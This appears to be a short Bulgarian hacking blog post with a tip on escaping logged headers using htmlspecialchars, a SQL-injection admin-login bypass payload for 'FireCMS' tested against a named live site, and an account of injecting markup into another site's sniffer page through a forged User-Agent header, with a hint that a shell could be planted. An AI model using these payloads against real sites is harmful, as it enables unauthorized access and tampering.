Как се защитават header-ите.

Обикновенно сайтовете имат логери в които записват данни от вашите header-и като cookie , user-agent , connection и така нататък сега ето как се защитават тези данни: С функцията htmlspecialchars(ТУК HEADER-A); примерно htmlspecialchars($_SERVER['HTTP_USER_AGENT']);

FireCMS

Някаква система за администрация на сайтове в момента не може да се изтегли , но се намират уязвими сайтове.

FireCMS

CMS : http://sourceforge.net/projects/firecms/
Download: Not Avaliable
Author  : f0xxx1
Web     : http://0f0xxx1.wordpress.com/

Exploit

Admin Panel Bypass:
Username: ‘ OR ’1′ = ’1
Password: ‘ OR ’1′ = ’1

PoC=
Tested on http://comnet.bg/admin/

Как да манипулираме снифер ?

Или по специално the0.co.cc/sniff.php

Тъй като снифера е картинка която изпраща данни към сайта който ги приема и записва във файл , който се изкарва в
textarea ,беше лесно за маниполиране. За да вземе информацията като browser,referer и други са нужни header-и.
Тези header-и могат да се редактират с програмата Live HTTP headers.

Отворих я и започнах да записвам header-ите и след това намерих header-ите които се изпращаха към сървъра , дадах
User-Agent:  {Браузърът ви}  и му зададах тази стойност </textarea>  и дадох Reply.Резултата би трябвало да излезе всичко след </textarea>  на страницата , добре значи мога да вкарам някой shell или нещо подобно вътре. Ако сте разбрали до тук би трябвало да се сетите какво следва нататък…Няма да продължавам заради хахорщината която може да направи сайта на нищо.

.f0xxx1